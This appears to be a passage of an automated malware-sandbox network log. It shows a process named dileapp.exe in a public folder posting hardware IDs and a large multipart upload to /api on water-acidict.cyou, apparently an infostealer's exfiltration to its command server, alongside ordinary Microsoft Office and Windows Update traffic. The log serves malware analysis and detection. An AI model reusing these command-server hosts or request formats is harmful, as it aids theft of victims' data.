                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9N5R1N%2Ffdb%2BurKiKxkIYoQBRc78rqBm3UnjVYh5MsOFV2UIl0u6kd2L3riV6%2FCoMjgiAesW7VTNX8aa4TgKee%2BaOwgfPX4%2FOD9hlkn%2BqhmaZMflGMyMesNOYs5lVjFtpXNjZ%2F0Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5edc0fe89436a-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2240&min_rtt=2234&rtt_var=842&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21345&delivery_rate=1307072&cwnd=184&unsent_bytes=0&cid=7e1a315f67e1d927&ts=1063&x=0"
2024-11-29 22:10:37 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
Data Ascii: fok 8.46.123.228
2024-11-29 22:10:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49774 | 172.67.156.217 | 443 | 5448 | C:\Users\Public\Netstat\dileapp.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:39 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=SCOYR4SPLUV5I
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1237
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:39 UTC1237OUTData Raw: 2d 2d 53 43 4f 59 52 34 53 50 4c 55 56 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 53 43 4f 59 52 34 53 50 4c 55 56 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 43 4f 59 52 34 53 50 4c 55 56 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 53 43 4f 59 52 34 53 50 4c 55 56
                                                                                                                                      Data Ascii: --SCOYR4SPLUV5IContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--SCOYR4SPLUV5IContent-Disposition: form-data; name="pid"1--SCOYR4SPLUV5IContent-Disposition: form-data; name="lid"c2CoW0--bandl--SCOYR4SPLUV
                                                                                                                                      2024-11-29 22:10:39 UTC | 1016 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:39 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=pg6u3j164cd9r2d6kqctm2o7lc; expires=Tue, 25-Mar-2025 15:57:18 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNc2YYUNuTdBVtnitNvcxps12kwH%2FM1DB3l2Yi2yoI7GHBiqApNlOkSDo4%2BdsiEsdNaHhmooQiHWoe6rXb4G8CbPi17fNgC8zbSBZ7F5%2B0RgljCghJa3aZvSZlSf4z3SX1MzpY8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5edd3cfa543fe-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1808&rtt_var=753&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2151&delivery_rate=1615044&cwnd=236&unsent_bytes=0&cid=7b2b27ee7b95ebb7&ts=849&x=0"
                                                                                                                                      2024-11-29 22:10:39 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      26 | 192.168.2.4 | 49775 | 172.67.156.217 | 443 | 5448 | C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:41 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=H21GF95SIZLLSB8UP
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 305436
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:41 UTC15331OUTData Raw: 2d 2d 48 32 31 47 46 39 35 53 49 5a 4c 4c 53 42 38 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 48 32 31 47 46 39 35 53 49 5a 4c 4c 53 42 38 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 32 31 47 46 39 35 53 49 5a 4c 4c 53 42 38 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d
                                                                                                                                      Data Ascii: --H21GF95SIZLLSB8UPContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--H21GF95SIZLLSB8UPContent-Disposition: form-data; name="pid"1--H21GF95SIZLLSB8UPContent-Disposition: form-data; name="lid"c2CoW0--bandl-
                                                                                                                                      2024-11-29 22:10:43 UTC | 1022 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:43 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=lolq74pifvhfc525n269pnkt7q; expires=Tue, 25-Mar-2025 15:57:22 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PTBo2U%2FiOJp26SrJjLcFzZH8hsnprml2AyaFhny5wyB%2FZEZaKDEHgmrAT3M8bWX3sNFZYGTbJ9c7nlUWuwyw9qzcTMY8yoJxKvVpY8wvo1D2%2Brow2UJRB6R2p6OdAJRPrU406VA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ede39d2b0f9f-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=113&recv=322&lost=0&retrans=1&sent_bytes=4228&recv_bytes=307214&delivery_rate=153490&cwnd=213&unsent_bytes=0&cid=10f16caea3300485&ts=2121&x=0"


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      27 | 192.168.2.4 | 49777 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:58 UTC | 195 | OUT | GET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:10:58 UTC | 471 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:58 GMT
                                                                                                                                      Content-Type: text/plain
                                                                                                                                      Content-Length: 218853
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public
                                                                                                                                      Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
                                                                                                                                      ETag: "0x8DD0EF5BC53602D"
                                                                                                                                      x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221058Z-174f7845968ljs8phC1EWRe6en00000010g000000000025a
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                      2024-11-29 22:10:59 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                      Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                      2024-11-29 22:10:59 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                      Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49778 | 20.109.210.53 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:58 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=stBxbGhrHxDYMZ9&MD=gESBNraw HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                      Host: slscr.update.microsoft.com
2024-11-29 22:10:59 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Expires: -1
                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                      MS-CorrelationId: 773e147a-1028-438f-927a-9e2728fa451a
                                                                                                                                      MS-RequestId: 10ab233a-c403-480a-9ea5-5847813c7d51
                                                                                                                                      MS-CV: msFeOx/wpUSybFzo.0
                                                                                                                                      X-Microsoft-SLSClientCache: 1440
                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:58 GMT
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 30005
2024-11-29 22:10:59 UTC | 15824 | IN | Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-29 22:10:59 UTC | 14181 | IN | Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


Session ID | Source IP | Source Port | Destination IP | Destination Port
29 | 192.168.2.4 | 49781 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:00 UTC | 192 | OUT | GET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:01 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 450
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                                                      x-ms-request-id: 22636776-e01e-0003-4fa8-420fa8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221101Z-174f78459684db9fhC1EWRc7g400000000d00000000031r7
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:01 UTC | 450 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


Session ID | Source IP | Source Port | Destination IP | Destination Port
30 | 192.168.2.4 | 49782 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:00 UTC | 192 | OUT | GET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:01 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 2980
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                      x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221101Z-174f7845968swgbqhC1EWRmnb400000010kg00000000mugz
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:01 UTC | 2980 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


Session ID | Source IP | Source Port | Destination IP | Destination Port
31 | 192.168.2.4 | 49780 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:00 UTC | 193 | OUT | GET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:01 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 3788
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                                                      x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221101Z-174f7845968cdxdrhC1EWRg0en00000010c000000000qh5r
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:01 UTC | 3788 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


Session ID | Source IP | Source Port | Destination IP | Destination Port
32 | 192.168.2.4 | 49783 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:01 UTC | 192 | OUT | GET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:01 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 408
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                      ETag: "0x8DC582BB56D3AFB"
                                                                                                                                      x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221101Z-174f7845968qj8jrhC1EWRh41s00000010d000000000gavd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:01 UTC | 408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                                      33          192.168.2.4  49784        13.107.246.63   443
                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                      2024-11-29 22:11:01 UTC  192                OUT        GET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:01 UTC  494                IN         HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 2160
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                                                      x-ms-request-id: 576a30ce-f01e-0052-7c0e-419224000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221101Z-174f7845968pght8hC1EWRyvxg00000003s0000000003s5u
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:01 UTC  2160               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                                      34          192.168.2.4  49786        13.107.246.63   443
                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                      2024-11-29 22:11:03 UTC  192                OUT        GET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:03 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 415
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                                                      x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221103Z-174f7845968nxc96hC1EWRspw8000000108000000000d6tb
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:03 UTC  415                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                                      35          192.168.2.4  49785        13.107.246.63   443
                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                      2024-11-29 22:11:03 UTC  192                OUT        GET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:03 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 474
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                                                      x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221103Z-174f7845968cpnpfhC1EWR3afc000000102000000000kxnk
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:03 UTC  474                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                                      36          192.168.2.4  49787        13.107.246.63   443
                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                      2024-11-29 22:11:03 UTC  192                OUT        GET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:03 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 471
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                                                      x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221103Z-174f7845968j6t2phC1EWRcfe800000010p000000000e31g
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
